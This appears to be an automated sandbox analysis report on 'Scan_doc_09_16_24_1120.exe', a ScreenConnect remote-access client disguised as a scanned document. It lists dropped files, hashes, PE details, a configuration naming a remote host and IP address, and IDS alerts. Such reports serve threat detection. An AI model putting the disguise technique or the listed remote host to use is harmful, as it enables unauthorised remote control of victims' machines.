                                                                                                                                                                                                                                                                        MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                        SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                        SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                        SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                                        Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                        MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                        SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                        SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                        SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

                                                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1590
                                                                                                                                                                                                                                                                        Entropy (8bit):5.363907225770245
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                                                                                                                        MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                                                                                                                        SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                                                                                                                        SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                                                                                                                        SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

                                                                                                                                                                                                                                                                        C:\Windows\System32\user.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):563
                                                                                                                                                                                                                                                                        Entropy (8bit):5.038578038992003
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvhgQv/vXbAa3xT:2dL9hK6E46YPFV3vH
                                                                                                                                                                                                                                                                        MD5:798B6C387EFBFB8E358A934AAE04099A
                                                                                                                                                                                                                                                                        SHA1:041EFFE7ADEF3CA3CC117D657A255E7A468989B5
                                                                                                                                                                                                                                                                        SHA-256:721B738D47F154D32EF1284A2BA9ACCC68F49A83EC93A69FE488477EBF69027F
                                                                                                                                                                                                                                                                        SHA-512:E6369861086EFD343213C4BDD596AA76F53D8E55B9E513D1D2BE60DE25A2E9A77530A6ED6E1AE1C0163E1738D07FFEEA58A24DD7B2EA45E068EE0A685F75B86F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a23%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.421566266250459
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:GSvfpi6ceLP/9skLmb0OTfWSPHaJG8nAgeMZMMhA2fX4WABlEnN/0uhiTw:lvloTfW+EZMM6DFyR03w
                                                                                                                                                                                                                                                                        MD5:7AE1CB1CB7990962FCE9DEAF0DA4235E
                                                                                                                                                                                                                                                                        SHA1:63794E46BA3FADB13C0570D4D59E71DE4DCF66CF
                                                                                                                                                                                                                                                                        SHA-256:26A3800D8FFB181DB437A446FF28A1320F0BC81AEEE84DEFA4AFF0A52B3D2855
                                                                                                                                                                                                                                                                        SHA-512:68CA744D90133E641D06178E61AE05C4AA36281DB4B1C45E1E014FC61785BADBB4E7470226E0DB0F3F1FF0CC9C79402CB866AF2A57A45B64C554DF43E4B5721F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................&E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.514553749500508
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                                                                                        File size:83'368 bytes
                                                                                                                                                                                                                                                                        MD5:3d6752aea446d36e3078f6ae7c0490a1
                                                                                                                                                                                                                                                                        SHA1:71660374adf680ae661c675d1723bd5ab06c77a8
                                                                                                                                                                                                                                                                        SHA256:8626a972070c42a888f9372155d32cb05a3f9140d607136e4f5680fb32c2bd77
                                                                                                                                                                                                                                                                        SHA512:5524b657cb2fecf481d542e57d953371f2e30fffe7913f0846d4a2ff90d5f0863a3f2f9b7df3ec0fd126f7bc2eefb44c72599f1aa7092c717d9447b719c0b16b
                                                                                                                                                                                                                                                                        SSDEEP:1536:xoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD7UxD2l:renkyfPAwiMq0RqRfbaxZJYYD7l
                                                                                                                                                                                                                                                                        TLSH:56835B43B5E18875E9720E3118B1D9B4593FBD110EA48EAF3398426E0F351D19E3AE7B
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b

                                                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                                        Error Number:0
                                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                                        • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        call 00007FB06081F3BAh
                                                                                                                                                                                                                                                                        jmp 00007FB06081EE6Fh
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                                        je 00007FB06081EFF7h
                                                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h

                                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2da8
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                                        CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

                                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-10-02T06:23:00.190265+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549722TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:01.313130+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549723TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:05.234030+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549729TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:06.357364+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549731TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:07.756451+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549734TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:08.886579+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549739TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:11.300178+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549742TCP
                                                                                                                                                                                                                                                                        2024-10-02T06:23:13.032777+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.549743TCP

                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.407124996 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.407219887 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:51.407313108 CEST49705443192.168.2.5178.215.236.119
